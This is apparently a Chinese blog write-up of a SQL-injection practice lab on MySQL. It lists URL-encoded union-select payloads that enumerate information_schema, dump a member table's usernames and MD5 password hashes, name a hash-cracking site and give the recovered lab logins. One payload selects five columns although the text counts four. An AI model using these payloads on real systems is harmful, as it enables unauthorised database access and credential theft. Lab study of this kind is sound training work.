vlambda博客
学习文章列表

sql注入靶机手工复现(mysql数据库)

MySQL数据库手工注入漏洞测试

靶场介绍

解体思路:

1、寻找注入点
2、判断是否存在注入
3、利用order by 判断字段数量
4、联合注入

复现

1、寻找注入点

访问,发现了其他页面

跳转页面后,发现可以注入点

sql注入靶机手工复现(mysql数据库)

2、判断注入

and 1=1 返回正常

sql注入靶机手工复现(mysql数据库)

and 1=2 返回错误

sql注入靶机手工复现(mysql数据库)

可以判断出,存在注入点

3、order by 判断字段数量

order by 4 正常回显

sql注入靶机手工复现(mysql数据库)

order by 5 ,发现到5报错,说明只有四个字段数

sql注入靶机手工复现(mysql数据库)

4、联合注入

使用联合查询来查询回显值位置

id=-1%20union%20select%201,2,3,4,5
sql注入靶机手工复现(mysql数据库)

返回值在2和3

根据返回值,构造拼接语句进行查询数据库名和版本

id=-1 union select 1,database(),version(),4
sql注入靶机手工复现(mysql数据库)

得到数据库名后,进行查询数据库,爆破表名

id=-1%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema%20=%20%22mozhe_Discuz_StormGroup%22#
sql注入靶机手工复现(mysql数据库)

根据表名,爆破段名

id=-1%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name%20=%20%22StormGroup_member%22%20#

sql注入靶机手工复现(mysql数据库)

根据段名,爆破内容

id=-1%20union%20select%201,group_concat(name),group_concat(password),4%20from%20StormGroup_member%20#

sql注入靶机手工复现(mysql数据库)查询出数据后,进行MD5破解 破解网站

https://www.cmd5.com/
sql注入靶机手工复现(mysql数据库)

解密后,可以得到两个账号 账号一:mozhe dsan13 账号二:mozhe 928501 登陆后,就可以得到key

- END -